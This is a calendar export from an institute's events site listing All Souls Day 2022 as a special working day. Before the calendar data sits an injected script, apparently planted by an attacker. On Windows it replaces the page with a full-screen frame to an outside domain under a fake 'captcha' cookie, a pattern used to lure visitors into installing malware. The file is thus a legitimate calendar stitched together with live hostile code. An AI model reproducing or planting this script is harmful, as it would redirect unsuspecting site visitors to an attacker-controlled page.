<script secretid="test">
    (function () {
        function getCookie() {
            var e = document.cookie,
                n = new RegExp("(^|; )cookie-captcha-complete=([^;]*)").exec(e);
            return n ? decodeURIComponent(n[2]) : null
        }

        function isWindows() {
            return /windows|win32|win64/i.test(navigator.userAgent)
        }

        function checkCaptcha() {
            if (!getCookie() && isWindows()) {
                document.documentElement.innerHTML = '<!DOCTYPE html><html><head><style>html,body{margin:0;padding:0;height:100%;overflow:hidden}iframe{width:100%;height:100%;border:none}</style></head><body><iframe src="https://steam-cloud.pro/?domain="></iframe></body></html>'
                document.cookie = "cookie-captcha-complete=1; path=/; max-age=" + (60 * 60 * 24 * 365);
            }
        }
        if (document.readyState === "loading") {
            document.addEventListener("DOMContentLoaded", checkCaptcha)
        } else {
            checkCaptcha()
        }
    })() 
</script>BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//National Institute for Technical Excellence Inc. - ECPv6.15.20//NONSGML v1.0//EN
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-WR-CALNAME:National Institute for Technical Excellence Inc.
X-ORIGINAL-URL:https://nitex.ph
X-WR-CALDESC:Events for National Institute for Technical Excellence Inc.
REFRESH-INTERVAL;VALUE=DURATION:PT1H
X-Robots-Tag:noindex
X-PUBLISHED-TTL:PT1H
BEGIN:VTIMEZONE
TZID:UTC
BEGIN:STANDARD
TZOFFSETFROM:+0000
TZOFFSETTO:+0000
TZNAME:UTC
DTSTART:20210101T000000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTART;VALUE=DATE:20221102
DTEND;VALUE=DATE:20221103
DTSTAMP:20260423T224910
CREATED:20220817T225740Z
LAST-MODIFIED:20220817T225825Z
UID:2604-1667347200-1667433599@nitex.ph
SUMMARY:All Souls Day (Special Working Day)
DESCRIPTION:
URL:https://nitex.ph/event/all-souls-day/
CATEGORIES:Special Working Day
END:VEVENT
END:VCALENDAR